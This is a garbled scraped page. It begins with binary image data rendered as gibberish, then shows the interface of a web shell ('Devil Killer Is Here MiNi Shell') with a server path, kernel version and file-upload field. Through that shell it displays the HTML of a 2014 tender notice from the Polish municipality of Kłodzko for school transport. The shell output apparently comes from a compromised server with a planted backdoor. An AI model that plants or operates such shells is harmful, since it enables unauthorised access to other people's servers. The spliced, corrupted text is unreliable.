JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140716/237932-N-2014.html

<p class="kh_header"><b>Kłodzko: Dowóz uczniów do jednostek oświatowych w roku szkolnym 2014/2015</b><br>
<b>Numer ogłoszenia: 237932 - 2014; data zamieszczenia: 16.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kłodzko , ul. Okrzei 8a, 57-300 Kłodzko, woj. dolnośląskie, tel. 74 6474100, faks 74 6474103.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.ug-klodzko.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów do jednostek oświatowych w roku szkolnym 2014/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest DOWÓZ UCZNIÓW DO JEDNOSTEK OŚWIATOWYCH W ROKU SZKOLNYM 2014/2015.

Przedmiot zamówienia obejmuje:

ZADANIE I  ZAKUP BILETÓW MIESIĘCZNYCH 
DO SZKOŁY PODSTAWOWEJ IM. STANISŁAWA MIKOŁAJCZYKA W JASZKOWEJ DOLNEJ Z MIEJSCOWOŚCI:
Wojciechowice, 
Jaszkowa Górna, 
Droszków 
uczniowie wsiadają najwcześniej o godzinie 7:25, w szkole  na godzinę 7:50
DO SZKOŁY PODSTAWOWEJ IM. GEN. WŁADYSŁAWA SIKORSKIEGO W OŁDRZYCHOWICACH KŁODZKICH Z MIEJSCOWOŚCI:    
Piotrowice, 
Romanowo, 
Rogówek 
uczniowie wsiadają najwcześniej o godzinie 7:15, w szkole  na godzinę 7:50

DO PRZEDSZKOLA GMINNEGO W OŁDRZYCHOWICACH KŁODZKICH Z MIEJSCOWOŚCI:  
Piotrowice, 
uczniowie wsiadają najwcześniej o godzinie 7:15, w przedszkolu na godzinę 7:55

DO SZKOŁY INTEGRACYJNEJ W SZALEJOWIE GÓRNYM Z MIEJSCOWOŚCI:  
Gołogłowy, 
Bierkowice, 
Korytów, 
Ruszowice, 
Kamieniec,
Szalejów Dolny
  uczniowie wsiadają najwcześniej o godzinie 7:10, w szkole  na godzinę 7:50
z miejscowości:
 Stary Wielisław, 
 Szalejów Dolny 
uczniowie wsiadają najwcześniej o godzinie 7:23, w szkole  na godzinę 7:45

DO PRZEDSZKOLA GMINNEGO W SZALEJOWIE DOLNYM Z MIEJSCOWOŚCI: 
Kamieniec
Szalejów Górny,  uczniowie wsiadają najwcześniej o godzinie 7:10
z miejscowości:
Stary Wielisław, 
uczniowie wsiadają najwcześniej o godzinie 7:23

DO ZESPOŁU SZKÓŁ W WOJBORZU Z MIEJSCOWOŚCI: 
Ścinawica, 
Młynów,
Wojbórz, 
 Łączna, 
 uczniowie wsiadają najwcześniej o godzinie 7:15, w szkole  na godzinę 7:51
z miejscowości:
 Gołogłowy, 
Piszkowice, 
 Bierkowice, 
uczniowie wsiadają najwcześniej o godzinie 7:30
z miejscowości:
 Ławica, 
 Podtynie, 
 Morzyszów, 
 Wilcza, 
 uczniowie wsiadają najwcześniej o godzinie 7:15, w szkole  na godzinę 7:50

DO PRZEDSZKOLA GMINNEGO Z ODDZIAŁAMI INTEGRACYJNYMI W BIERKOWICACH Z MIEJSCOWOŚCI:
Ścinawica, uczniowie wsiadają najwcześniej o godzinie 7:15, w przedszkolu  na godzinę 7:50
Gołogłowy, uczniowie wsiadają najwcześniej o godzinie 7:30, w przedszkolu  na godzinę 7:50

DO SZKOŁY PODSTAWOWEJ W KROSNOWICACH Z MIEJSCOWOŚCI: 
Starków
uczniowie wsiadają najwcześniej o godzinie 7:25, w szkole  na godzinę 7:50

DO GIMNAZJUM PUBLICZNEGO IM. WŁ. ST. REYMONTA W KŁODZKU Z MIEJSCOWOŚCI:  
 Drożków,
 Jaszkowa Dolna, 
 Jaszkowa Górna,
uczniowie wsiadają najwcześniej o godzinie 7:20, w szkole  na godzinę 7:50
 Podzamek,
 Jaszkówka,
uczniowie wsiadają najwcześniej o godzinie 7:35, w szkole  na godzinę 7:50
 Stary Wielisław,
uczniowie wsiadają najwcześniej o godzinie 7:25, w szkole  na godzinę 7:50
 Starków,
 Krosnowice,  
uczniowie wsiadają najwcześniej o godzinie 7:18, w szkole  na godzinę 7:50
 Ruszowice,
 Kamieniec,
 Roszyce,
 Korytów,
 Szalejów Dolny,
 Gołogłowy,
uczniowie wsiadają najwcześniej o godzinie 7:16, w szkole  na godzinę 7:50
 Szalejów Górny,
 Szalejów Dolny,
uczniowie wsiadają najwcześniej o godzinie 7:30, w szkole  na godzinę 7:50
 Marcinów,
uczniowie wsiadają najwcześniej o godzinie 7:30, w szkole  na godzinę 7:50
 Ołdrzychowice Kłodzkie, 
 Piotrowice,
 Romanowo,
 Rogówek,
 Żelazno
uczniowie wsiadają najwcześniej o godzinie 7:10, w szkole  na godzinę 7:50
 Wojciechowice, 
uczniowie wsiadają najwcześniej o godzinie 7:35, w szkole  na godzinę 7:50	 
odwóz uczniów wg planów lekcji

ZADANIE II  DOWÓZ ZAMKNIĘTY 

Dowóz i odwóz uczniów do Zespołu Szkół Specjalnych w Kłodzku z miejscowości: Krosnowice, Marcinów, Żelazno do Zespołu Szkół Integracyjnych im. Jana Pawła II w Kłodzku z miejscowości: Marcinów, Krosnowice, Ołdrzychowice, do Przedszkola Gminnego z Oddziałami Integracyjnymi w Bierkowicach 
z miejscowości: Ołdrzychowice.


Charakterystykę powyższego zadania stanowi załącznik nr 1 do opisu przedmiotu zamówienia.
 
 UWAGA na trasie I uczniowie wsiadają rano o godzinie 7:20, koniec trasy Zespół Szkół Integracyjnych w Kłodzku godzina 7:50
na trasie II uczniowie wsiadają rano o godzinie 7:05 koniec trasy Przedszkole Gminne 
z działami Integracyjnymi w Bierkowicach godzina 7:55.

ZADANIE III - ZAKUP BILETÓW MIESIĘCZNYCH  
Dla uczniów zamieszkałych w Boguszynie 

Do Zespołu Szkół Integracyjnych im. Jana Pawła II w Kłodzku przy ul. Zamiejskiej 24 - szkoły podstawowej i gimnazjum. 
Do Gimnazjum Publicznego im. Wł. St. Reymonta w Kłodzku.  


Charakterystykę powyższych zadań stanowi załącznik nr 1 do opisu przedmiotu zamówienia.
 
Rozpoczęcie zajęć lekcyjnych w w/w jednostkach oświatowych o godz. 800  ,
   zakończenie zajęć lekcyjnych: 	około 13 25 w szkole podstawowej, 
około 14 15 w gimnazjum.

 UWAGA	uczniowie wsiadają rano najwcześniej o godzinie 7.00
		uczniów należy dowieźć do w/w jednostek do godz. 7 45, 
            	odwóz uczniów po zajęciach lekcyjnych około godz. 14 25 

ZADANIE IV  DOWÓZ ZAMKNIĘTY

 Przedmiotem zamówienia jest dowóz uczniów niepełnosprawnych, w tym ucznia niepełnosprawnego ruchowo poruszającego się na wózku inwalidzkim z miejscowości Święcko do Niepublicznej Szkoły Podstawowej Specjalnej przy Domu Pomocy Społecznej dla Dzieci w Ludwikowicach Kłodzkich. 


 UWAGA uczniowie wsiadają rano najwcześniej o godzinie 7.00.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do 20% wartości zamówienia podstawowego w sytuacjach wynikłych z organizacji roku szkolnego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.14.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości:
Zadanie nr 1 -5 000 zł (pięć tysięcy zł)
Zadanie nr 2 - 1 500 zł (tysiąc pięćset zł)
Zadanie nr 3 - Zamawiający nie żąda wniesienia wadium.
Zadanie nr 4 - Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy oświadczenie, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże wykonanie co najmniej 2 usługi w zakresie objętym przedmiotem zamówienia o wartości co najmniej równej 50% ceny oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy oświadczenie, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy oświadczenie, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy oświadczenie, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie wykonawcy o braku podstaw do wykluczenia (Załącznik Nr 2 ), Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu (Załącznik Nr 3), Oświadczenie Wykonawcy, o którym mowa w art. 24 ust. 2 pkt. 5 ustawy czy Wykonawca należy do grupy kapitałowej. W przypadku przynależności do grupy kapitałowej Wykonawca składa listę podmiotów należących do tej samej grupy kapitałowej zgodnie z art. 26 ust. 2d ustawy, (Załącznik nr 4), Załącznik nr 1 do formularz ofertowego nr 1 stanowiący integralną część umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian
Zgodnie z art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści oferty, na podstawie, której dokonany będzie wybór wykonawcy w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej: 
1) zmiany danych teleadresowych Wykonawcy lub Zamawiającego;
2) zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy;
3) siły wyższej;
4) zmiany liczby dowożonych dzieci;
5) zmian godzin rozkładów jazdy 
6) zmiany trasy
7) zmiany podatku VAT.
Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, jednocześnie nie stanowią one zobowiązania Zamawiającego na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ug-klodzko.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kłodzko , ul. Okrzei 8a , 57-300 Kłodzko pok. 408.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.07.2014 godzina 10:00, miejsce: Urząd Gminy Kłodzko , ul. Okrzei 8a , 57-300 Kłodzko pok. 207.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE I - ZAKUP BILETÓW MIESIĘCZNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE I  ZAKUP BILETÓW MIESIĘCZNYCH 
DO SZKOŁY PODSTAWOWEJ IM. STANISŁAWA MIKOŁAJCZYKA W JASZKOWEJ DOLNEJ Z MIEJSCOWOŚCI:
Wojciechowice, 
Jaszkowa Górna, 
Droszków 
uczniowie wsiadają najwcześniej o godzinie 7:25, w szkole  na godzinę 7:50
DO SZKOŁY PODSTAWOWEJ IM. GEN. WŁADYSŁAWA SIKORSKIEGO W OŁDRZYCHOWICACH KŁODZKICH Z MIEJSCOWOŚCI:    
Piotrowice, 
Romanowo, 
Rogówek 
uczniowie wsiadają najwcześniej o godzinie 7:15, w szkole  na godzinę 7:50

DO PRZEDSZKOLA GMINNEGO W OŁDRZYCHOWICACH KŁODZKICH Z MIEJSCOWOŚCI:  
Piotrowice, 
uczniowie wsiadają najwcześniej o godzinie 7:15, w przedszkolu na godzinę 7:55

DO SZKOŁY INTEGRACYJNEJ W SZALEJOWIE GÓRNYM Z MIEJSCOWOŚCI:  
Gołogłowy, 
Bierkowice, 
Korytów, 
Ruszowice, 
Kamieniec,
Szalejów Dolny
  uczniowie wsiadają najwcześniej o godzinie 7:10, w szkole  na godzinę 7:50
z miejscowości:
 Stary Wielisław, 
 Szalejów Dolny 
uczniowie wsiadają najwcześniej o godzinie 7:23, w szkole  na godzinę 7:45

DO PRZEDSZKOLA GMINNEGO W SZALEJOWIE DOLNYM Z MIEJSCOWOŚCI: 
Kamieniec
Szalejów Górny,  uczniowie wsiadają najwcześniej o godzinie 7:10
z miejscowości:
Stary Wielisław, 
uczniowie wsiadają najwcześniej o godzinie 7:23

DO ZESPOŁU SZKÓŁ W WOJBORZU Z MIEJSCOWOŚCI: 
Ścinawica, 
Młynów,
Wojbórz, 
 Łączna, 
 uczniowie wsiadają najwcześniej o godzinie 7:15, w szkole  na godzinę 7:51
z miejscowości:
 Gołogłowy, 
Piszkowice, 
 Bierkowice, 
uczniowie wsiadają najwcześniej o godzinie 7:30
z miejscowości:
 Ławica, 
 Podtynie, 
 Morzyszów, 
 Wilcza, 
 uczniowie wsiadają najwcześniej o godzinie 7:15, w szkole  na godzinę 7:50

DO PRZEDSZKOLA GMINNEGO Z ODDZIAŁAMI INTEGRACYJNYMI W BIERKOWICACH Z MIEJSCOWOŚCI:
Ścinawica, uczniowie wsiadają najwcześniej o godzinie 7:15, w przedszkolu  na godzinę 7:50
Gołogłowy, uczniowie wsiadają najwcześniej o godzinie 7:30, w przedszkolu  na godzinę 7:50

DO SZKOŁY PODSTAWOWEJ W KROSNOWICACH Z MIEJSCOWOŚCI: 
Starków
uczniowie wsiadają najwcześniej o godzinie 7:25, w szkole  na godzinę 7:50

DO GIMNAZJUM PUBLICZNEGO IM. WŁ. ST. REYMONTA W KŁODZKU Z MIEJSCOWOŚCI:  
 Drożków,
 Jaszkowa Dolna, 
 Jaszkowa Górna,
uczniowie wsiadają najwcześniej o godzinie 7:20, w szkole  na godzinę 7:50
 Podzamek,
 Jaszkówka,
uczniowie wsiadają najwcześniej o godzinie 7:35, w szkole  na godzinę 7:50
 Stary Wielisław,
uczniowie wsiadają najwcześniej o godzinie 7:25, w szkole  na godzinę 7:50
 Starków,
 Krosnowice,  
uczniowie wsiadają najwcześniej o godzinie 7:18, w szkole  na godzinę 7:50
 Ruszowice,
 Kamieniec,
 Roszyce,
 Korytów,
 Szalejów Dolny,
 Gołogłowy,
uczniowie wsiadają najwcześniej o godzinie 7:16, w szkole  na godzinę 7:50
 Szalejów Górny,
 Szalejów Dolny,
uczniowie wsiadają najwcześniej o godzinie 7:30, w szkole  na godzinę 7:50
 Marcinów,
uczniowie wsiadają najwcześniej o godzinie 7:30, w szkole  na godzinę 7:50
 Ołdrzychowice Kłodzkie, 
 Piotrowice,
 Romanowo,
 Rogówek,
 Żelazno
uczniowie wsiadają najwcześniej o godzinie 7:10, w szkole  na godzinę 7:50
 Wojciechowice, 
uczniowie wsiadają najwcześniej o godzinie 7:35, w szkole  na godzinę 7:50	 
odwóz uczniów wg planów lekcji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.14.40.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
